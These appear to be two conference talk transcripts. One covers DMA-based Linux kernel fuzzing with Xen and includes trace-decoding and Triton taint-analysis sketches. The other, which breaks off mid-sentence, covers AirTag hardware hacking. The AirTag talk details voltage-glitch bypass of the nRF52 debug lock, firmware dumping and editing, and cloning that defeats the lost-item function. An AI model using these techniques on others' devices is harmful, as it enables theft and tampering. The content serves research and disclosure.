So this is some deep layer of the Linux networking stack where it receives this sk_buff structure and does a memcpy from one place to another. We have no clue what those are, but this memcpy obviously trips a null-pointer dereference, so either the source or the destination is corrupt. And it got corrupted because the fuzzer found a way to corrupt it. So at this point, the idea I had was: all right, let's take a look at which one of these pointers is the culprit. We would want to stop the execution of a VM fork just at that memcpy, so we would be able to look at the state of the VM, the registers that contain those pointers, to see which one is null. So we want to stop the execution at that memcpy. The way we do this has a couple of steps, and we need a couple of bits of information for it. First of all, we want to figure out what the address of kasan_report is, because that's the point we want to execute the VM up to using single-stepping, since just before kasan_report is reached we'll obviously have the memcpy. So what we do is we just execute the VM with that crashing input, and we see that kasan_report is indeed tripped, and we see the virtual address of where that kasan_report function is. So at this point we want to create a VM fork and place the buffer that we know will trip kasan_report into its memory. We will use this tool called RWM and write the contents of that file into the target buffer. That will allow us to execute this VM to reach the crashing input and record what happened. Obviously we could use Processor Trace as well for this, but I found single-stepping to be just as effective and a little less convoluted. So now we have that VM fork set up with the crashing input injected into its memory. Now we just use the stepper tool, which uses MTF single-stepping, to go all the way and stop when the virtual address of kasan_report is reached, and we pipe the output of that into a file. If you take a look at what this file contains, it is effectively just the disassembly of each instruction that executed, and it reaches kasan_report at the end. So there are a ton of instructions in there. Just looking at that is not all that helpful for the task we are trying to do, but what we can take from it is really just the instruction pointers that were observed and translate them, using the kernel's debug symbols, with addr2line. That will actually get us the source lines of what each of those instructions actually is. So now if you take a look at this decoded log, we will see each instruction pointer and which source line it corresponds to. At the bottom of this file we see it immediately: that's where gro_pull_from_frag0 is, and there is the memcpy that trips the null-pointer dereference. So I just take the last instruction that's still in the memcpy before kasan_report trips, and I want to re-execute that VM to stop at that memcpy, at the last instruction in that memcpy, to be able to see what the register state is. So again, I just create a fork, I use RWM the same way as before and just change the domain ID. Now I want to stop on this address, which is the memcpy's address. I don't actually need to save the output because I know where it's going.
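(A quick aside on that decoding step: batch-feeding the recorded instruction pointers through addr2line is easy to script. The sketch below assumes the stepper log has one hex address per line, which is an assumption about the log format, not a guarantee about the real tool's output.)

#!/usr/bin/env python3
# Turn a single-step log of instruction pointers into function/source lines
# using the kernel's debug info. Log format and paths are assumptions made for
# illustration, not the exact KFX output.
import re, subprocess, sys

HEX_ADDR = re.compile(r"\b0x[0-9a-fA-F]+\b")

def decode(step_log, vmlinux):
    addrs = []
    for line in open(step_log, errors="ignore"):
        m = HEX_ADDR.search(line)              # assume the first hex value is the RIP
        if m:
            addrs.append(m.group(0))
    out = subprocess.run(["addr2line", "-f", "-e", vmlinux] + addrs,
                         capture_output=True, text=True, check=True).stdout.splitlines()
    # addr2line -f prints two lines per address: function name, then file:line
    return [f"{addrs[i // 2]} {out[i]} {out[i + 1]}" for i in range(0, len(out), 2)]

if __name__ == "__main__":
    print("\n".join(decode(sys.argv[1], sys.argv[2])))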
But now this domain, ID 61, is paused at that memcpy, so I can just go and take a look at the register state, take a look at the source pointer. RSI is the register that holds the source pointer in this case, and RDI holds the destination one. Oh well, it kind of looks like both source and destination in that memcpy are null pointers, so they are both corrupted. So this approach did not really yield anything that we could use to figure out what went wrong, since it looks like that entire sk_buff is just bogus. So what else can we do? Well, the idea is that if we can't figure out what went wrong just at the memcpy, at the location where the bug trips, we can compare the execution that goes to kasan_report with the execution that is normal. So we can take the normal input that was used as the seed. We know that this is the input that the kernel would have executed with normally and that does not cause a crash; we see that it reaches the end harness signal. So we will just create a fork from that, use stepper to go all the way to the end harness, just as we did before, stop on this address, and save the output to a log file. Now we can take the instruction pointers from this log file, decode them using addr2line, and save that as well. And now we have the decoded log for both the execution that goes to kasan_report and the one that goes to the end harness, and we can just diff them. The very first line in this diff is going to be where the execution diverges from the normal one. And we have the source line, so you can just go straight there, look at the code and, bam, this is the first line that only executes with the input that the fuzzer found. So it turns out that the sk_buff is constructed by the driver and is passed to those deeper-layer kernel subsystems, but the way it gets constructed here is based on information that came from that Rx descriptor buffer, and it's bogus. So obviously what needs to happen is that even if that Rx descriptor buffer says that, oh, there is this bit set, there needs to be a little bit more sanity checking in place before that sk_buff structure is manipulated. So if you actually look at the latest kernel code, you will find that this code has been fixed, and it was effectively just missing a sanity check on data that was coming from DMA. All right, let's look at a couple more bugs just for fun. Can you spot the bug here? How about this one? If you haven't noticed yet, the theme of these bugs is about the same: you get some DMA-sourced input that is used without input validation, and it is just used for whatever the kernel decides. In this case, for example, the slot ID is derived from DMA memory and is used as an array index. What can go wrong there? So yeah, we found nine null-pointer dereferences and three array-index-out-of-bounds accesses. We found some infinite loops in the interrupt handlers, and also cases where, during boot, the kernel can be tricked into accessing user memory as well, which is not great. And these pretty much all stem from the same problem: the kernel does not treat DMA memory as a security boundary. DMA memory is kind of treated as trusted, and consequently all of these devices are treated as trusted, and when you are talking about USB devices, well, it's not great that all USB devices are trusted like that. Another case that we wanted to look at is whether this kernel code might perform double fetches.
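Before the double-fetch discussion, one more note on that trace-diffing trick: once both runs are decoded (for example with the addr2line sketch earlier), finding the divergence point is just a walk over the two logs until the first mismatch. The file names below are placeholders.

# Find the first source line where the crashing run diverges from the clean
# seed run. Both inputs are lists of decoded "addr function file:line" strings,
# as produced by the decode() sketch above.
def first_divergence(crash_lines, clean_lines):
    for i, (a, b) in enumerate(zip(crash_lines, clean_lines)):
        if a != b:
            return i, a, b
    return None  # one trace is a prefix of the other

# Usage sketch (paths are placeholders):
# crash = decode("stepper_kasan.log", "vmlinux")
# clean = decode("stepper_seed.log", "vmlinux")
# print(first_divergence(crash, clean))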
A double fetch is effectively a race condition where you can have time-of-check-to-time-of-use problems: even if the kernel did perform some sanity checks on DMA-accessible memory, by the time it finishes its sanity checks, that data might have changed underneath, because the device has access to that same memory. So if the device wins the race, the kernel might finish its security checks, but the data can still be corrupt. So obviously we wanted to detect if that happens. The idea was: okay, let's remove the EPT permissions from DMA pages and just create a record of when DMA pages are being accessed, and if we get a page fault where the kernel is reading some address from DMA and it's the same page with the same offset twice in a row, that's the strictest definition of a double fetch. We can detect that and report it as a crash to AFL, so we can go and take a look at the code to see whether the double fetch is a security concern. We thought it would be rare, but it turns out that it happens all over the place. Some kernel drivers treat DMA memory as totally trusted, so they just keep going back and fetching the same memory left and right. But so far we haven't found a strictly-speaking security issue, because it turns out that the same byte is being fetched but different bits are used from that byte. So far it hasn't looked dangerous, but obviously this practice of just trusting DMA memory is bad and needs to change. We've received considerable pushback from kernel maintainers for various reasons, performance, fear of regressions, but ultimately, to close this class of bugs, DMA memory should really be treated the same way as user-space memory is: every piece of DMA memory should get copied into a local buffer before being used by the kernel, and that's absolutely not the case today. All right, so we found a bunch of bugs, we fixed them, mission accomplished, right? Not so fast. As you recall, the way we found the DMA input points was just through reading the source code and doing some experiments with ftrace, but there was this lingering feeling of, hey, did we really discover all the DMA input points? What data do we have to back that argument? I mean, we had a bunch of people look at the code, so that gave us some confidence, but we couldn't put a number on it. We also got bogged down just documenting all the bugs we found, and at some point it just became non-productive to keep staring at the code, because it was just annoying. So let's do better. This tool called DMA monitor we added to the project as a standalone EPT-fault monitoring tool. This effectively came after the double-fetch detection code was added, and the idea is that if we can already detect when DMA is being accessed for double fetches, well, we can use the same approach to detect when DMA is being accessed at all, right? We can really just trace who is accessing DMA, and where, by using EPT faults. The only thing we need is to know where the DMA pages are. Fortunately, the Linux kernel has its own internal DMA API that all kernel modules should be using to set up DMA for devices, and in there is a function that is used to allocate memory to be used for DMA: dma_alloc_attrs. We can hook that function using a breakpoint through the hypervisor, and hook the return address when the function finishes, and that will get us the virtual address of all pages that the kernel uses for DMA.
And then we can just remove the EPT permission for all those pages on the fly, effectively giving us a way to log all the code sites that read from DMA as the kernel is running. So let's take a look at how this works in practice. I'm booting up the same VM, and on the right I'm firing up DMA monitor. I just tell it what the domain is and where the debug JSON of the kernel is. dma_alloc_attrs is hooked as the kernel is booting, and then we pretty much immediately start to see a ton of DMA accesses happening while the kernel is still booting. As you can see, there are quite a few pages allocated for DMA, and we can grep through that log and see when the access is just a read access. We can take the instruction pointer for each, sort them and just take the unique ones. There's still a ton of them, but we can feed this through addr2line to get an explicit list of all the places that the kernel touched DMA from. So this is quite a few places, but at least now we have an explicit list that we need to go through and take a look at, to see whether the data that is being read from DMA at these locations is complex enough to warrant fuzzing, which is awesome. We didn't have to look at the source code to figure out where to start. So this is miles better than what we were doing before, because we just have the list that we have to look at, instead of having to keep parsing everything in the kernel to see whether it's a DMA access or not. There were still some corner cases with the DMA monitor, even though it's way better than what we were doing before. Sometimes the DMA access that the kernel is doing is just reading something from DMA, stashing it into some structure and returning, and then the kernel goes away and does something else. So we were like, okay, well, where is that data going to get used after the DMA access? Nothing at that site warranted fuzzing, but that data is now sitting in private kernel memory, and it can still be potentially malicious. So where is it getting used, and is it safe? Well, we had no idea. We didn't want to go back to reading the source code, because it's very hard to follow that kind of data lifecycle in the kernel, and it's very error-prone, very manual and annoying. So that's where this next tool idea came from, which we call full-VM taint analysis. The goal is to really just track tainted data propagation in the kernel. We know where the data is coming from, right? We have the source, that's the DMA access, so we want to taint that address and track what the kernel is doing with the data, where the data lands and how it affects the execution of the kernel. We will use VM trace, aka Intel Processor Trace, to record the execution of the kernel with very low overhead, and after some time replay the recorded instruction stream through the taint engine of Triton, a dynamic binary analysis framework. That's a separate open source project that's really awesome that we integrate with, and it will tell us which instruction pointers get tainted by the data that we just read from DMA, and that will tell us all the locations where the control flow of the kernel depends on tainted data. So let's take a look at this as well. Here is a VM fork that I know will perform a DMA access on this page. So I fire up DMA monitor on it, I pause it, and yes, we see there is a single DMA access to that page, where something was read out from DMA and stored somewhere in the kernel. So we don't know at this point where else that data is getting used.
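To give a feel for what that taint-tracking step does under the hood, here is a tiny sketch using Triton's Python bindings. This is not the actual vmtaint implementation; the instruction bytes and addresses below are made-up placeholders, and in the real setup the (address, opcode) pairs come from decoding the Processor Trace log of the running fork.

# Minimal taint-propagation sketch with Triton: taint the DMA location, replay a
# (made-up) instruction stream, and report every instruction that touches tainted
# data. Addresses and opcodes are placeholders for what the PT decode would give.
from triton import TritonContext, ARCH, Instruction, MemoryAccess

ctx = TritonContext()
ctx.setArchitecture(ARCH.X86_64)

DMA_ADDR, DMA_SIZE = 0x12345000, 8                  # placeholder DMA read location
ctx.taintMemory(MemoryAccess(DMA_ADDR, DMA_SIZE))   # taint source: the DMA page

trace = [
    (0xffffffff81000000, b"\x48\x8b\x04\x25\x00\x50\x34\x12"),  # mov rax, [0x12345000]
    (0xffffffff81000008, b"\x48\x89\xc3"),                      # mov rbx, rax
]

for addr, opcode in trace:
    inst = Instruction()
    inst.setAddress(addr)
    inst.setOpcode(opcode)
    ctx.processing(inst)
    if inst.isTainted():
        print(f"tainted: {addr:#x} {inst.getDisassembly()}")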
So now the idea is to use VM taint to figure that out. We will use VM taint to save the state first. This saves the stack and the registers of the starting point into a file that we will need for the taint engine. We create another fork, we start the collection of the Processor Trace buffer, we pipe that into a file, and we unpause the VM fork. Now it's running and it's recording the execution into that buffer. We do that for a second or two, we pause it, and we can start decoding that Processor Trace and feeding it through the taint engine, piping it into the taint.log file, and take a look, while that is processing, at what it has found so far. Right off the bat we see where that mov copied the data, which register got tainted, and from there what else got tainted during the execution of the kernel. And there we go. Right off the bat we can see all the different instruction pointers that got tainted from just that single DMA access. And if you do this for the boot of the kernel, you can really check the full lifecycle of DMA-sourced data through the execution of the kernel, without even having to open up the source code of the kernel, and it gives you right away all the locations where the control flow might depend on tainted data. You go take a look, and if it looks complex enough, you put the harness around it and you can start the fuzzer. So this code is released, as well as everything else. Most of the code is upstream in Xen, but this code you can grab from GitHub. There are also a couple of goodies that I wanted to mention. This is pretty new: some of the targets that we wanted to fuzz were kind of difficult to get working in a Xen VM, so we came up with this way of being able to transplant the state of the system from one hypervisor to another. So in this case, you can take a snapshot on KVM or QEMU and load it up on Xen, because VM forks really only need the CPU state and the memory of your target to be fuzzable. So you can use all of those different hypervisors to take a snapshot, load it up on Xen and fuzz away. A couple of things we want to work on next, or already are working on: top of the list is automation. Putting an end-to-end automated fuzzing system together is what everyone is asking about, so that's absolutely something we are looking at. It would also be pretty awesome to capture system state using Intel DCI, which is a USB 3-based debug connection that you can attach to a bare-metal system to capture the full system state. This would allow us to really fuzz any code that runs on any system, including BIOS and SMM code, so this would be pretty cool. Another idea we have is creating the Senseif to Ring Zero mode tool, and adding nested virtualization support so we can fuzz hypervisors; obviously with Intel DCI we would be able to capture hypervisor state as well, so that might not necessarily be a requirement, but it would still be cool to have. And a couple of things I didn't cover in this talk that are already possible using VM forking and all the tools that are available open source: fuzzing other operating systems, fuzzing Xen itself, and user-space binaries are absolutely something you can fuzz with this system, black-box binaries and even malware. So if you're looking for ideas, here's a couple of things that are already possible. So thank you. That was my talk. If you have any questions or comments, please reach out. And thanks go to a whole bunch of people who made this work possible. This was not a single person's job.
This was large teams working on this. So thanks to everyone for your involvement, and absolutely to the open source community for releasing all the tools that make rapid security development like this possible. So thanks. I hope you found some cool information in this talk, and the goal here is to get you to go out and fuzz the kernel, because we found some bugs, but you can bet there are more to be found. So thank you. I'm looking forward to your questions.
|
Last year we successfully upstreamed a new feature to Xen that allows high-speed fuzzing of virtual machines (VMs) using VM-forking. Recently, through collaboration with the Xen community, external monitoring of VMs via Intel(r) Processor Trace has also been upstreamed. Combined with the native Virtual Machine Introspection (VMI) capability, Xen now provides a unique platform for fuzzing and binary analysis. To illustrate the power of the platform we'll present the details of a real-world fuzzing operation that targeted Linux kernel modules from an attack vector that has previously been hard to reach: memory exposed to devices via Direct Memory Access (DMA) for fast I/O. If the input the kernel reads from DMA-exposed memory is malformed or malicious - what could happen? So far we discovered: 9 NULL-pointer dereferences; 3 array index out-of-bound accesses; 2 infinite loops in IRQ context and 2 instances of tricking the kernel into accessing user-memory but thinking it is kernel memory. The bugs have been in Linux for many years and were found in kernel modules used by millions of devices. All bugs are now fixed upstream. This talk will walk you through how the bugs were found: what process we went through to identify the right code locations; how we analyzed the kernel source and how we analyzed the runtime of the kernel with Xen to pinpoint the input points that read from DMA. The talk will explain the steps required to attach a debugger through the hypervisor to collect kernel crash logs and how to perform triaging of bugs via VM-fork execution-replay, a novel technique akin to time-travel debugging. Finally, we'll close with the release of a new open-source tool to perform full-VM taint analysis using Xen and Intel(r) Processor Trace. REFERENCES: https://github.com/intel/kernel-fuzzer-for-xen-project https://www.youtube.com/watch?v=3MYo8ctD_aU
|
10.5446/54241 (DOI)
|
Hey, welcome to my talk, Hacking the Apple AirTags. My name is Thomas Roth, I'm a security researcher from Germany and I also run a YouTube channel called Stack Smashing where I talk about reverse engineering, hardware hacking and all that kind of stuff. If you want to contact me, you can find me on Twitter at ghidraninja, and I hope you enjoy this presentation. Now before we start, let's quickly talk about what I will cover in the next few minutes. First off, all the attacks that you will see are local attacks and they all require hardware access, so I will not show any drive-by exploits or anything that can be exploited over Bluetooth or so. Second of all, a lot of the info in this talk is based on reverse engineering, and so there might be minor mistakes, I might get something wrong; the devil is always in the details, and as I don't have access to the source, everything is really based on reverse engineering and so on. And my real goal with this is to just have some fun with hardware hacking and explore a device in a fun way. Now as always, this kind of work is not possible without a lot of other people, and so there are a couple of people that I want to thank. First off, Colin O'Flynn, who is one of the persons that nerd-sniped me with the AirTags in the first place; second of all, Lennert Wouters and Plunk, who I did a lot of reverse engineering and a lot of experiments with; Jiska Classen, who gave me a lot of information on the Apple U1 chip and helped me a bit with some RTKit details; David Halton, who provided very in-depth images of chips and de-layering of the PCB; and also LimitedResults, without whom a lot of the work you are about to see would not be possible, because he found the actual vulnerability in the nRF52 last year. Now before we jump in, let's talk about the AirTag itself. The AirTag is a Bluetooth key finder, so really nothing too special, at least I thought so when I first saw it. But what's unique about the AirTag is that it contains ultra-wideband via the so-called U1 chip. Ultra-wideband is a technology that allows, for example, iPhones that have ultra-wideband to very precisely locate the AirTag, and we're talking centimeter-precise here, including direction finding and so on. So this is something really neat, and ultra-wideband works in, I think, the 5 to 6 GHz range, so it's really high frequency and very difficult to analyze using cheap equipment; you really need very high-end SDRs and so on to analyze it. But now we have a very cheap device that contains this U1 chip that we can potentially use for research on ultra-wideband. The second cool feature is the Find My network: basically, when you use the Apple AirTags, any iPhone that comes into Bluetooth range of one will report the location of your AirTag to Apple servers, and this is all done with privacy in mind. I don't really know too much about it, but it's a really cool feature, because if you, let's say, lose your AirTag in France, you'll be able to locate it from Germany as long as any iPhone walks past. I also think it's funny because Wikipedia says that it's a key finder, but you know, it doesn't actually attach to a key without separate accessories. Now given all this, I was pretty uninterested in the AirTags, I didn't buy any, and I really had zero interest in them.
That is, until one morning I wake up and I get a message: hey, here are the flash contents of the AirTag, and attached to that message was a dump of the SPI flash of the AirTag. Now, being a hardware hacker, I obviously at least had to peek inside of this dump, and so I ran hexdump on it and I immediately saw this. You might see those strings on the right side here, and if you read them backwards, you might see that they basically spell out things such as firm root or NVRAM root, CRLG root and so on and so forth. And if you've worked with Apple embedded devices, you might immediately recognize this as being the ftab of an RTKit firmware. RTKit is the embedded operating system that Apple uses in a lot of very small devices such as the AirPods. And if you ever see such a firmware and you want to extract it, you can use a tool called ftab dump, which makes it really, really easy. Now, knowing that this runs RTKit already made it slightly more interesting to me, but after digging into this for a bit, it turns out that this firmware is actually the U1 firmware, and so that's really interesting. Then, scrolling further through the hexdump, I also discovered a couple of function names such as nrf_fstorage_init, nrf_fstorage_write, nrf_fstorage_erase and so on and so forth. And that is nRF52 code. Now, the nRF52 is a very common microcontroller family that you can basically find in almost any key finder device. I'm very familiar with this chip, and so I thought that was kind of interesting. And so after realizing that maybe the AirTags are a good platform to analyze the U1, play with U1 firmware, have a look at the nRF firmware and so on, I was nerd-sniped and I knew that I needed to buy an AirTag. So I went to the Apple Store and I grabbed a couple of AirTags, and I tried to open one up by, you know, prying open the backside, and I immediately broke it. Like, I somehow ripped off this inductor, because the AirTags are really, really sensitive when you try to open them. They have a very thin PCB, and if you nudge on the wrong side of it, you will destroy it. So if you try to open up an AirTag at home, always try to use these three points; it's basically where the battery compartment screws into the backside of the device, and there it's relatively safe to open up the AirTag. And so after destroying my first AirTag in literally the first minute that I unpacked it, I managed to open a second one, and this is basically what you see: a device with a ton of test points and so on, a couple of passives such as capacitors, the battery contacts, and the big coil in the middle, which is actually the speaker of the AirTag. And nothing really interesting except this small chip on the bottom right here. This is the accelerometer, and we will have some fun with that one later on. If you remove the PCB, which is really annoying because you basically have to pry it out since it's all glued very tightly into the AirTag, you will get to see this, and this is the interesting side, because this is where all the integrated circuits, controllers and so on are. Let's start with the biggest one. This big silver chip here is the Apple U1 chip, the ultra-wideband chip. And if you look next to it, we have the nice antenna connector. Now, what's interesting about the U1 chip is that so far it was only available in very expensive devices such as the iPhone or the Apple Watch or so, not really in a price range where you could buy ten of them, solder out the U1 and then experiment with it. But now, with the AirTag, we have a U1 available for like 30 or 40 bucks.
And so this is, I think, really going to be interesting, and I think we will see a lot of research with the U1 chip from the Apple AirTag. To the left of the U1 chip we have the SPI flash, and this is the SPI flash whose dump nerd-sniped me towards the AirTag in the first place. To the left of the SPI flash we have the nRF52, a Cortex-M microcontroller. Now, this microcontroller is super common in any IoT device nowadays, and so it was clear that this chip would handle Bluetooth, most probably the iPhone communication, NFC, and it's also known to be vulnerable to a fault injection attack. Basically, this chip can be locked down so you can prevent people from debugging it, but there's a known vulnerability, found by LimitedResults, that allows us to resurrect the debug interface using fault injection, as you will see in a bit. And so at this point, having the AirTag open and seeing the nRF52, the plan for me at least was clear: find the test pads and pins to connect an SWD programmer to the device, unlock the chip using fault injection, and then hopefully gain access to the firmware to be able to analyze it and see how the AirTag works. Is all the logic in the nRF52, or is the logic maybe done in the U1 and the nRF just acts as kind of a modem or so? I was really curious at this point to see what is actually running on the nRF52. Now, normally when you open a new device, you have to probe all those pins and so on and figure out which ones are actually the SWD interface, and you have to solder off components, because the nRF, for example, doesn't really have any contacts you can probe. But luckily for me, Colin O'Flynn had already done all that work. On his Twitter, you can see that he created this nicely annotated version of the AirTag, and he also found out which test pads on the backside of the AirTag are the pads that we need to connect our debugger to. And he also already tried to program the nRF52 and found out that, indeed, Apple had locked down the debugging interface. Now, this numbering scheme that Colin created kind of became the standard in the AirTag hacking scene, and so if you are looking for some info on the AirTags and you see some pin numbers somewhere, this is probably the numbering scheme that everyone is referring to. And thanks to Colin, we know that pins 35 and 36 are the pins to which we can connect an SWD programmer such as a J-Link or a cheap ST-Link or so, and via those pins, we will be able to reprogram the AirTag. Now, as mentioned, the debugging interface on the AirTag is unfortunately locked down using a feature called APPROTECT, and this basically locks down the debug access port. You can still erase the chip, which will re-enable debugging, and you can program it, but then you lose the firmware. And so while we could put our own firmware on it, at this point in time it was much more interesting to dump the firmware than to put our own on it. And luckily, thanks to LimitedResults' great work, we can just use fault injection to re-enable it. Now, what is fault injection? Usually, when you take the power supply to a chip and you drop the power for a very, very short amount of time, you can cause a kind of memory corruption in the chip. And sometimes this will allow you to skip over instructions, sometimes it will allow you to corrupt memory reads and so on.
And so it's kind of difficult to understand what it really does in the chip, because you can't really look into it while you drop the power for a couple of nanoseconds. But you can get a relatively stable attack using this kind of approach. And so the basic idea would be that during the start of the processor, at some point in time, the processor will check whether debugging is disabled, and if so, it will skip the step of enabling the debug hardware. Now, if we manage to perform a fault injection attack at just this moment in time, we might be able to trick the chip into enabling the debug hardware, because we skip, for example, over the check instruction. Now, how do we do this on the nRF52? In general, most microcontrollers have an external power supply and then an internal power supply that is derived from that external supply. And so, for example, in the case of the nRF52, the chip normally runs at 1.8 volts, but then on the inside of the chip those 1.8 volts are converted to different voltages for different peripherals. So, for example, the CPU core might run at 0.9 volts, or Bluetooth might run at 1.2 volts. And the problem is we only really want to attack the CPU core. We only want to attack the actual instruction; we don't really care about Bluetooth and so on. And we want to be careful not to disrupt other parts of the chip too much, because then it might happen that something else fails and resets the chip and so on. So we want to target only the CPU core, if possible. Now, these regulators tend to be quite noisy, and so, to reduce noise, the chip often has an external connection for what's called a bypass capacitor. A bypass capacitor is a small capacitor that is directly connected to this internal voltage rail to stabilize the voltage towards the CPU core. And you might already notice: one side of that capacitor gives us direct access to the voltage supply of the CPU core. Now, if we attach, for example, a switch towards ground to it and we press that switch, we will create a short circuit that will disable the regulator; we basically suck all the power out of the regulator, and by that we can interrupt the power supply towards the CPU core. Then, if we open the switch again, we re-enable power. Now, obviously, with a manual switch we can't get the precision and the timing that we require to hit just the right instruction. If we, however, connect a MOSFET to it, which is basically just an electronic switch, we can digitally control the CPU core power supply, and now we can use something like an FPGA to control the power supply and time it very precisely. Now, I like to go cheap on these kinds of attacks and show just how easy, for example, fault injection is, and so I decided to use a Raspberry Pi Pico to perform this glitching attack. So basically, I connected the MOSFET to a Raspberry Pi Pico, and now if the Raspberry Pi Pico enables one of its IOs, it will interrupt the power supply to the CPU core, and if you turn it off again, the CPU core will start again. And so if we hook this up to the AirTag, we basically first need to find that bypass capacitor. Now, Apple was nice enough to put that capacitor on the backside, and so on the easily accessible side of the AirTag. And even better, they even put a test pad right on that core power supply, and so we can just solder a cable on there, connect our MOSFET to it, and we are almost ready to go.
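The firmware on the Pico side can be tiny; a MicroPython-flavoured sketch of the sequence described next is below. The pin numbers, polarities and delays are invented placeholders, and nanosecond-scale glitch pulses really need tighter timing than interpreted Python gives you, so treat this strictly as pseudocode for the steps rather than a working glitcher.

# MicroPython-style pseudocode for one glitch attempt: power-cycle the AirTag,
# wait for the nRF52 rail to come up, wait a configurable delay, then short the
# CPU-core bypass capacitor for a configurable width. All pins/timings invented.
from machine import Pin
import time

TARGET_PWR = Pin(2, Pin.OUT)   # switches battery power to the AirTag
NRF_PWR_OK = Pin(3, Pin.IN)    # level-shifted nRF52 1.8 V rail, goes high at boot
GLITCH     = Pin(4, Pin.OUT)   # gate of the MOSFET across the core bypass cap

def glitch_once(delay_us, width_us):
    GLITCH.value(0)
    TARGET_PWR.value(0)            # power-cycle the target
    time.sleep_ms(50)
    TARGET_PWR.value(1)
    while not NRF_PWR_OK.value():  # wait until the nRF52 supply is up
        pass
    time.sleep_us(delay_us)        # delay into the boot where the check happens
    GLITCH.value(1)                # drop the CPU-core power ...
    time.sleep_us(width_us)
    GLITCH.value(0)                # ... restore it, then test SWD from the host

A host-side script then simply calls this over and over with different delay and width values and checks whether the debug interface comes back, which is the sweep described a bit later.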
Now, fault injection, in most cases, is not something that you just try once and are successful with; you want to try a ton of times, and eventually you are successful. And because each attempt is really short, let's say 100 milliseconds, we can try ten times per second, and so even if we try 100 or 1000 times, we still get our desired result pretty quickly. Now, to be able to restart the AirTag and to also get a signal when the AirTag has actually booted, we also want to connect the nRF52 power supply to the Pico. Basically, the AirTag runs at 3 volts from a battery, and it takes a couple of milliseconds for the power supply to reach the nRF52, and so we want to make sure that we get a signal on our Raspberry Pi Pico once the chip starts booting, so that we can time our fault injection attack just right. To do this, we basically use a level shifter to convert the 1.8 volts from the nRF52 to the 3.3 volts that the Raspberry Pi Pico expects on its input. And then all we have to do is power up the AirTag, and you can do that by just connecting an IO directly to the battery contacts of the AirTag. And so what we can do now is turn on the AirTag from the Raspberry Pi Pico, then wait until the power supply to the nRF52 is enabled, which is basically the point in time at which the nRF52 boots, and then we can perform our fault injection using the MOSFET connected to an IO. And now all we need to do is also connect an SWD programmer that we will then use to check if our glitch was successful. So basically, we start by just turning everything off. Then we turn on the power supply towards the nRF52. We wait for the signal from the nRF52 power supply. Then we wait a short amount of time, and then we enable the MOSFET, which will drop the CPU core power for a very short amount of time, and then we re-enable it. And then we use our SWD programmer to check whether we were successful. Now, this sounds like a lot of complexity and a lot of work, but it's really, really easy. For example, the code on the Raspberry Pi Pico is just these couple of lines: basically, we power-cycle the target and wait for the nRF power to come up, then we wait for a configurable amount of time, and then we glitch for a configurable amount of time. And if you set this up on a real AirTag, it will look something like this. We have our AirTag, in this case in kind of a breakout state to make life a bit easier. Then we have a debugger, which is basically the programmer that we use to check whether our glitch was successful. And then we have this breakout board that I designed, which is really just a Raspberry Pi Pico with a couple of level shifters and so on to make life easier, and also with the glitcher on board. Now, as you can imagine, the boot of the nRF52 takes quite a long time, and so finding just the right spot in time where we drop the power to attack it is pretty difficult. But luckily for us, LimitedResults documented pretty well, with a power trace, at which point in time of the boot of the chip we need to glitch. In his blog post, which you should check out on limitedresults.com, he precisely describes at which point in time we need to drop the power for a very short amount of time to re-enable the debugging interface. And after setting this all up and using a glitch width that I knew was successful from the past, we are ready to go. Now, if we look at this on our oscilloscope, you can see that our glitch is not really precise.
This is because the code that I'm using to glitch it is very imprecise, but as it turns out, this is enough. You will get lucky eventually, just because if you try often enough, you will hit the right point in time. To control the glitcher, I wrote a simple Jupyter script that basically just sets the delay, tries a range of delays and a range of pulse widths for the glitch, and then just checks whether JTAG is enabled. And so I let this run for a bit, and after a couple of minutes I got lucky and I got this success. Success means that basically JTAG was re-enabled: the test JTAG function in the Jupyter notebook tests whether it can connect via SWD to the chip, and in this case that was successful. And suddenly, on my hard drive, I found this: my script automatically dumped all the interesting areas of the chip. And so we had the flash dump, the BPROT ranges, FICR, UICR and so on, all the interesting ranges that are in the chip. And so I started analysing the AirTag firmware. I started by just running strings on the firmware, and I immediately recognised these strings here. This is an indication that they actually run corecrypto, which is Apple's crypto library, on the AirTags. And the next thing that jumped to my eye was this URL, found.apple.com/airtag. This is the URL that you get when you NFC-scan an AirTag; it will lead you to a URL with the ID encoded in it. Now, I was really curious to see whether the firmware had any additional validations that I didn't know about, and so I tried to modify the URL in a hex editor and reflash the firmware to the AirTag. And then I got this. And so, what do you do when you can change the URL of something to whatever you like? Obviously, you try to rickroll people with an AirTag. Now you might wonder, well, why would you go through all of that effort to rickroll people? And I had a ton of YouTube comments ask exactly that question: hey, why aren't you just using an NFC sticker and so on? But the goal with this was really just to see whether the firmware has any additional verification methods, and this was the easiest way to check whether we can just modify something, because it's very visual: you just tap it with your iPhone and you know whether you were successful. But continuing the analysis of the strings output, I found this line here, and I recognized these letters, because in the iPhone this is exactly the serial number that I saw in the Find My application for this AirTag. And so it turns out that we can also freely edit the serial number of the AirTag; for example, mine is now stacksmashing. And this is pretty interesting, because I personally expected the configuration to be in the U1 or on the SPI flash. But apparently all the configuration details of the AirTag are stored in the nRF52's internal flash. And that brought up a pretty interesting question, because after pairing, for example, you can also see your email address and so on, all in the AirTag firmware basically. And this brought up the question, for Lennert and me, whether we can actually clone an AirTag. Our idea was that I would dump a configured AirTag and send the flash dump over to Lennert; he would flash his AirTag, and we would check whether my AirTag would be discovered in Belgium, where Lennert lives. And so we set this all up. I had my AirTag nicely set up at my home, I dumped the AirTag, I removed the battery, I sent the firmware over to Lennert. And what do you know?
A couple of minutes later, my AirTag was suddenly in Belgium. So it somehow, in a couple of minutes, traveled a couple of hundred kilometers. And so it works: we can clone an AirTag. All the data that is required for cloning an AirTag is in the nRF52 flash. And this is pretty interesting, because it also means that if you, for example, find an AirTag or steal an AirTag, you can actually reset it and set it up with a new serial number, bypassing the lost function and so on and so forth. And neither the SPI flash nor the U1 seems to be really involved in the pairing of the AirTag. So that was pretty interesting, because we were all pretty sure that Apple would do some crazy stuff with the U1 or so to make cloning and stealing and so on a bit harder. And I'm curious what this will mean for, for example, bikes that have the Find My technology integrated. Now, with this information, we also started comparing our two dumps, and so we basically started comparing what is different between different AirTags and what changes with the pairing. And for example, here in the hex dump, you can see my email address, the censored version that is shown when you find the AirTag, and so on. Overall, the information that is part of the pairing is relatively small, and you still have a bit of room in the firmware to, for example, integrate your own custom payload into the AirTag. And one thing that got a lot of buzz surrounding the AirTags was their privacy protections. A lot of people were very afraid of getting tracked by an AirTag. Now, while I get the idea of being tracked, I personally think that the AirTag is a terrible tracking device. It doesn't have a microphone, well, not a real microphone. It doesn't have GPS, it doesn't have GSM. The only thing that you have is Bluetooth and the location of an iPhone that walks by, and even there there are some limitations. And I mean, if you go on 